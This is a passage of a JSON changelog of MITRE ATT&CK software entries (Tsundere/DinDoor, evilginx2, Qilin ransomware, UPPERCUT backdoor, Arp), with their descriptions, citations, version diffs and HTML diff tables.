                            "description": "Ctrl-Alt-Intel. (2026, March 4). MuddyWater Exposed: Inside an Iranian APT operation . Retrieved April 6, 2026.",
                            "url": "https://ctrlaltintel.com/research/MuddyWater/"
                        },
                        {
                            "source_name": "SOCRadar_MuddyWaterDindoor_Mar2026",
                            "description": "SOCRadar. (2026, March 9). MuddyWater Uses Dindoor Malware Targeting U.S. Networks. Retrieved March 12, 2026.",
                            "url": "https://socradar.io/blog/iran-muddywater-dindoor-malware-us-networks/"
                        },
                        {
                            "source_name": "SecureListUbiedo_Tsundere_Nov2025",
                            "description": "Ubiedo, L. (2025, November 20). Blockchain and Node.js abused by Tsundere: an emerging botnet. Retrieved April 6, 2026.",
                            "url": "https://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Tsundere Botnet",
                        "DinDoor"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "tool",
                    "id": "tool--1eb9627d-a661-4db6-bf53-41b7dcc63087",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-01-30 20:15:05.674000+00:00",
                    "modified": "2026-04-23 02:18:02.821000+00:00",
                    "name": "evilginx2",
                    "description": "[evilginx2](https://attack.mitre.org/software/S9003) is an open-source adversary-in-the-middle (AiTM) attack framework based on the open-source nginx web server. [evilginx2](https://attack.mitre.org/software/S9003) can be used as a reverse proxy between victims and legitimate web services to intercept and capture credentials, authentication tokens, and session cookies.(Citation: Evilginx 2 July 2018)(Citation: Breakdev Evilginx 2.1 SEP 2018)(Citation: Sophos Evilginx MAR 2025)\n ",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9003",
                            "external_id": "S9003"
                        },
                        {
                            "source_name": "Sophos Evilginx MAR 2025",
                            "description": "Everts, M. (2025, March 28). Stealing user credentials with evilginx. Retrieved January 27, 2026.",
                            "url": "https://www.sophos.com/en-us/blog/stealing-user-credentials-with-evilginx"
                        },
                        {
                            "source_name": "Breakdev Evilginx 2.1 SEP 2018",
                            "description": "Gretzky, K. (2018, September 10). Evilginx 2.1 - The First Post-Release Update. Retrieved January 27, 2026.",
                            "url": "https://breakdev.org/evilginx-2-1-the-first-post-release-update/"
                        },
                        {
                            "source_name": "Evilginx 2 July 2018",
                            "description": "Gretzky, K.. (2018, July 26). Evilginx 2 - Next Generation of Phishing 2FA Tokens. Retrieved October 14, 2019.",
                            "url": "https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "evilginx2"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Identity Provider",
                        "Office Suite",
                        "SaaS"
                    ],
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [
                {
                    "type": "malware",
                    "id": "malware--e23d2777-b85d-44fc-861e-9149d399fbb9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-09-26 19:18:39.227000+00:00",
                    "modified": "2026-04-23 03:12:30.298000+00:00",
                    "name": "Qilin",
                    "description": "[Qilin](https://attack.mitre.org/software/S1242) is a ransomware family operated as a ransomware-as-a-service (RaaS) that has been active since at least 2022. It includes variants written in Go and Rust capable of targeting Windows, Linux, and VMware ESXi environments. [Qilin](https://attack.mitre.org/software/S1242) shares functionality overlaps with [Black Basta](https://attack.mitre.org/software/S1070), [REvil](https://attack.mitre.org/software/S0496), and [BlackCat](https://attack.mitre.org/software/S1068) ransomware. [Qilin](https://attack.mitre.org/software/S1242) affiliates have targeted multiple entities worldwide with the majority of victims in the US, France, Canada, and the UK, primarily in the manufacturing, technology, financial services, and healthcare sectors.(Citation: Trend Micro Agenda Ransomware AUG 2022)(Citation: SentinelOne Qilin NOV 2022)(Citation: BushidoToken Qilin RaaS JUN 2024)(Citation: Sophos Qilin MSP APR 2025)(Citation: Trend Micro Agenda Ransomware OCT 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1242",
                            "external_id": "S1242"
                        },
                        {
                            "source_name": "Agenda",
                            "description": "(Citation: Sophos Qilin MSP APR 2025)(Citation: Trend Micro Agenda Ransomware AUG 2022)(Citation: SentinelOne Qilin NOV 2022)(Citation: Trend Micro Agenda Ransomware OCT 2025)"
                        },
                        {
                            "source_name": "Sophos Qilin MSP APR 2025",
                            "description": "Bradshaw, A. et al. (2025, April 1). Qilin affiliates spear-phish MSP ScreenConnect admin, targeting customers downstream. Retrieved September 26, 2025.",
                            "url": "https://news.sophos.com/en-us/2025/04/01/sophos-mdr-tracks-ongoing-campaign-by-qilin-affiliates-targeting-screenconnect/"
                        },
                        {
                            "source_name": "Trend Micro Agenda Ransomware AUG 2022",
                            "description": "Magdy, S. et al. (2022, August 25). New Golang Ransomware Agenda Customizes Attacks. Retrieved September 26, 2025.",
                            "url": "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html"
                        },
                        {
                            "source_name": "SentinelOne Qilin NOV 2022",
                            "description": "SentinelOne. (2022, November 30). Agenda (Qilin). Retrieved September 26, 2025.",
                            "url": "https://www.sentinelone.com/anthology/agenda-qilin/"
                        },
                        {
                            "source_name": "BushidoToken Qilin RaaS JUN 2024",
                            "description": "Thomas, W. (2024, June 12). Tracking Adversaries: The Qilin RaaS. Retrieved September 26, 2025.",
                            "url": "https://blog.bushidotoken.net/2024/06/tracking-adversaries-qilin-raas.html"
                        },
                        {
                            "source_name": "Trend Micro Agenda Ransomware OCT 2025",
                            "description": "Trend Micro. (2025, October 23). Agenda Ransomware Deploys Linux Variant on Windows Systems Through Remote Management Tools and BYOVD Techniques. Retrieved March 26, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/25/j/agenda-ransomware-deploys-linux-variant-on-windows-systems.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Qilin",
                        "Agenda"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jiraput Thamsongkrah",
                        "Simon Williams"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Windows",
                        "Linux"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 03:12:30.298000+00:00\", \"old_value\": \"2025-10-23 21:54:13.055000+00:00\"}, \"root['description']\": {\"new_value\": \"[Qilin](https://attack.mitre.org/software/S1242) is a ransomware family operated as a ransomware-as-a-service (RaaS) that has been active since at least 2022. It includes variants written in Go and Rust capable of targeting Windows, Linux, and VMware ESXi environments. [Qilin](https://attack.mitre.org/software/S1242) shares functionality overlaps with [Black Basta](https://attack.mitre.org/software/S1070), [REvil](https://attack.mitre.org/software/S0496), and [BlackCat](https://attack.mitre.org/software/S1068) ransomware. [Qilin](https://attack.mitre.org/software/S1242) affiliates have targeted multiple entities worldwide with the majority of victims in the US, France, Canada, and the UK, primarily in the manufacturing, technology, financial services, and healthcare sectors.(Citation: Trend Micro Agenda Ransomware AUG 2022)(Citation: SentinelOne Qilin NOV 2022)(Citation: BushidoToken Qilin RaaS JUN 2024)(Citation: Sophos Qilin MSP APR 2025)(Citation: Trend Micro Agenda Ransomware OCT 2025)\", \"old_value\": \"[Qilin](https://attack.mitre.org/software/S1242) ransomware is a Ransomware-as-a-Service (RaaS) that has been active since at least 2022 with versions written in Golang and Rust that are capable of targeting Windows or VMWare ESXi devices. [Qilin](https://attack.mitre.org/software/S1242) shares functionality overlaps with [Black Basta](https://attack.mitre.org/software/S1070), [REvil](https://attack.mitre.org/software/S0496), and [BlackCat](https://attack.mitre.org/software/S1068) ransomware and its RaaS affiliates have been observed targeting multiple sectors worldwide, including healthcare and education in Asia, Europe, and Africa. (Citation: Trend Micro Agenda Ransomware AUG 2022)(Citation: SentinelOne Qilin NOV 2022)(Citation: BushidoToken Qilin RaaS JUN 2024)(Citation: Sophos Qilin MSP APR 2025)\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"(Citation: Sophos Qilin MSP APR 2025)(Citation: Trend Micro Agenda Ransomware AUG 2022)(Citation: SentinelOne Qilin NOV 2022)(Citation: Trend Micro Agenda Ransomware OCT 2025)\", \"old_value\": \"(Citation: Sophos Qilin MSP APR 2025)(Citation: Trend Micro Agenda Ransomware AUG 2022)(Citation: SentinelOne Qilin NOV 2022)\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][6]\": {\"source_name\": \"Trend Micro Agenda Ransomware OCT 2025\", \"description\": \"Trend Micro. (2025, October 23). Agenda Ransomware Deploys Linux Variant on Windows Systems Through Remote Management Tools and BYOVD Techniques. Retrieved March 26, 2026.\", \"url\": \"https://www.trendmicro.com/en_us/research/25/j/agenda-ransomware-deploys-linux-variant-on-windows-systems.html\"}, \"root['x_mitre_platforms'][2]\": \"Linux\"}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to42__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to42__0\"><a href=\"#difflib_chg_to42__top\">t</a></td><td class=\"diff_header\" id=\"from42_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[Qilin](https://attack.mitre.org/software/S1242)&nbsp;ransomware&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to42__top\">t</a></td><td class=\"diff_header\" id=\"to42_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[Qilin](https://attack.mitre.org/software/S1242)&nbsp;is&nbsp;a&nbsp;ransom</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">is&nbsp;a&nbsp;Ransomware-as-a-Service&nbsp;(RaaS)&nbsp;that&nbsp;has&nbsp;been&nbsp;active&nbsp;sin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ware&nbsp;family&nbsp;operated&nbsp;as&nbsp;a&nbsp;ransomware-as-a-service&nbsp;(RaaS)&nbsp;tha</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ce&nbsp;at&nbsp;least&nbsp;2022&nbsp;with&nbsp;versions&nbsp;written&nbsp;in&nbsp;Golang&nbsp;and&nbsp;Rust&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t&nbsp;has&nbsp;been&nbsp;active&nbsp;since&nbsp;at&nbsp;least&nbsp;2022.&nbsp;It&nbsp;includes&nbsp;variants&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">at&nbsp;are&nbsp;capable&nbsp;of&nbsp;targeting&nbsp;Windows&nbsp;or&nbsp;VMWare&nbsp;ESXi&nbsp;devices.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">written&nbsp;in&nbsp;Go&nbsp;and&nbsp;Rust&nbsp;capable&nbsp;of&nbsp;targeting&nbsp;Windows,&nbsp;Linux,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[Qilin](https://attack.mitre.org/software/S1242)&nbsp;shares&nbsp;func</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">and&nbsp;VMware&nbsp;ESXi&nbsp;environments.&nbsp;[Qilin](https://attack.mitre.o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tionality&nbsp;overlaps&nbsp;with&nbsp;[Black&nbsp;Basta](https://attack.mitre.o</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rg/software/S1242)&nbsp;shares&nbsp;functionality&nbsp;overlaps&nbsp;with&nbsp;[Black</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rg/software/S1070),&nbsp;[REvil](https://attack.mitre.org/softwar</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;Basta](https://attack.mitre.org/software/S1070),&nbsp;[REvil](ht</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e/S0496),&nbsp;and&nbsp;[BlackCat](https://attack.mitre.org/software/S</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tps://attack.mitre.org/software/S0496),&nbsp;and&nbsp;[BlackCat](https</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">1068)&nbsp;ransomware&nbsp;and&nbsp;its&nbsp;RaaS&nbsp;affiliates&nbsp;have&nbsp;been&nbsp;observed&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">://attack.mitre.org/software/S1068)&nbsp;ransomware.&nbsp;[Qilin](http</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">targeting&nbsp;multiple&nbsp;sectors&nbsp;worldwide,&nbsp;including&nbsp;healthcare&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s://attack.mitre.org/software/S1242)&nbsp;affiliates&nbsp;have&nbsp;targete</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;education&nbsp;in&nbsp;Asia,&nbsp;Europe,&nbsp;and&nbsp;Africa.&nbsp;(Citation:&nbsp;Trend&nbsp;M</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;multiple&nbsp;entities&nbsp;worldwide&nbsp;with&nbsp;the&nbsp;majority&nbsp;of&nbsp;victims&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">icro&nbsp;Agenda&nbsp;Ransomware&nbsp;AUG&nbsp;2022)(Citation:&nbsp;SentinelOne&nbsp;Qilin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;the&nbsp;US,&nbsp;France,&nbsp;Canada,&nbsp;and&nbsp;the&nbsp;UK,&nbsp;primarily&nbsp;in&nbsp;the&nbsp;manuf</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;NOV&nbsp;2022)(Citation:&nbsp;BushidoToken&nbsp;Qilin&nbsp;RaaS&nbsp;JUN&nbsp;2024)(Citat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">acturing,&nbsp;technology,&nbsp;financial&nbsp;services,&nbsp;and&nbsp;healthcare&nbsp;sec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion:&nbsp;Sophos&nbsp;Qilin&nbsp;MSP&nbsp;APR&nbsp;2025)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tors.(Citation:&nbsp;Trend&nbsp;Micro&nbsp;Agenda&nbsp;Ransomware&nbsp;AUG&nbsp;2022)(Cita</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion:&nbsp;SentinelOne&nbsp;Qilin&nbsp;NOV&nbsp;2022)(Citation:&nbsp;BushidoToken&nbsp;Qil</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">in&nbsp;RaaS&nbsp;JUN&nbsp;2024)(Citation:&nbsp;Sophos&nbsp;Qilin&nbsp;MSP&nbsp;APR&nbsp;2025)(Citat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion:&nbsp;Trend&nbsp;Micro&nbsp;Agenda&nbsp;Ransomware&nbsp;OCT&nbsp;2025)</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "malware",
                    "id": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-10-17 00:14:20.652000+00:00",
                    "modified": "2026-04-22 21:04:29.621000+00:00",
                    "name": "UPPERCUT",
                    "description": "[UPPERCUT](https://attack.mitre.org/software/S0275) is a 32-bit HTTP-based backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2017.(Citation: FireEye APT10 Sept 2018) Once thought to be exclusive to [menuPass](https://attack.mitre.org/groups/G0045), [UPPERCUT](https://attack.mitre.org/software/S0275) was also observed being used by [menuPass](https://attack.mitre.org/groups/G0045)-associated [MirrorFace](https://attack.mitre.org/groups/G1054) during [Operation AkaiRy\u016b](https://attack.mitre.org/campaigns/C0060).(Citation: Trend Micro Earth Kasha Anel NOV 2024)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0275",
                            "external_id": "S0275"
                        },
                        {
                            "source_name": "UPPERCUT",
                            "description": "(Citation: FireEye APT10 Sept 2018)"
                        },
                        {
                            "source_name": "ANEL",
                            "description": "(Citation: FireEye APT10 Sept 2018)"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha Anel NOV 2024",
                            "description": "Hiroaki, H. (2024, November 26). Guess Who\u2019s Back - The Return of ANEL in the Recent Earth Kasha Spear-phishing Campaign in 2024. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html"
                        },
                        {
                            "source_name": "FireEye APT10 Sept 2018",
                            "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.",
                            "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "UPPERCUT",
                        "ANEL"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 21:04:29.621000+00:00\", \"old_value\": \"2025-04-25 14:45:09.125000+00:00\"}, \"root['description']\": {\"new_value\": \"[UPPERCUT](https://attack.mitre.org/software/S0275) is a 32-bit HTTP-based backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2017.(Citation: FireEye APT10 Sept 2018) Once thought to be exclusive to [menuPass](https://attack.mitre.org/groups/G0045), [UPPERCUT](https://attack.mitre.org/software/S0275) was also observed being used by [menuPass](https://attack.mitre.org/groups/G0045)-associated [MirrorFace](https://attack.mitre.org/groups/G1054) during [Operation AkaiRy\\u016b](https://attack.mitre.org/campaigns/C0060).(Citation: Trend Micro Earth Kasha Anel NOV 2024)\", \"old_value\": \"[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"Trend Micro Earth Kasha Anel NOV 2024\", \"description\": \"Hiroaki, H. (2024, November 26). Guess Who\\u2019s Back - The Return of ANEL in the Recent Earth Kasha Spear-phishing Campaign in 2024. Retrieved April 17, 2026.\", \"url\": \"https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to40__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to40__0\"><a href=\"#difflib_chg_to40__top\">t</a></td><td class=\"diff_header\" id=\"from40_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[UPPERCUT](https://attack.mitre.org/software/S0275)&nbsp;is&nbsp;a&nbsp;bac</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to40__top\">t</a></td><td class=\"diff_header\" id=\"to40_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[UPPERCUT](https://attack.mitre.org/software/S0275)&nbsp;is&nbsp;a&nbsp;32-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">kdoor&nbsp;that&nbsp;has&nbsp;been&nbsp;used&nbsp;by&nbsp;[menuPass](https://attack.mitre.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">bit&nbsp;HTTP-based&nbsp;backdoor&nbsp;that&nbsp;has&nbsp;been&nbsp;used&nbsp;by&nbsp;[menuPass](htt</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">org/groups/G0045).&nbsp;(Citation:&nbsp;FireEye&nbsp;APT10&nbsp;Sept&nbsp;2018)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ps://attack.mitre.org/groups/G0045)&nbsp;since&nbsp;at&nbsp;least&nbsp;2017.(Cit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation:&nbsp;FireEye&nbsp;APT10&nbsp;Sept&nbsp;2018)&nbsp;Once&nbsp;thought&nbsp;to&nbsp;be&nbsp;exclusive</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;to&nbsp;[menuPass](https://attack.mitre.org/groups/G0045),&nbsp;[UPPE</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">RCUT](https://attack.mitre.org/software/S0275)&nbsp;was&nbsp;also&nbsp;obse</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rved&nbsp;being&nbsp;used&nbsp;by&nbsp;[menuPass](https://attack.mitre.org/group</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s/G0045)-associated&nbsp;[MirrorFace](https://attack.mitre.org/gr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oups/G1054)&nbsp;during&nbsp;[Operation&nbsp;AkaiRy\u016b](https://attack.mitre.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">org/campaigns/C0060).(Citation:&nbsp;Trend&nbsp;Micro&nbsp;Earth&nbsp;Kasha&nbsp;Anel</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;NOV&nbsp;2024)</span></td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "minor_version_changes": [
                {
                    "type": "tool",
                    "id": "tool--30489451-5886-4c46-90c9-0dff9adc5252",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:33:02.428000+00:00",
                    "modified": "2026-04-17 20:59:19.130000+00:00",
                    "name": "Arp",
                    "description": "[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0099",
                            "external_id": "S0099"
                        },
                        {
                            "source_name": "TechNet Arp",
                            "description": "Microsoft. (n.d.). Arp. Retrieved April 17, 2016.",
                            "url": "https://technet.microsoft.com/en-us/library/bb490864.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Arp",
                        "arp.exe"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows",
                        "macOS"
                    ],
                    "x_mitre_version": "1.3",
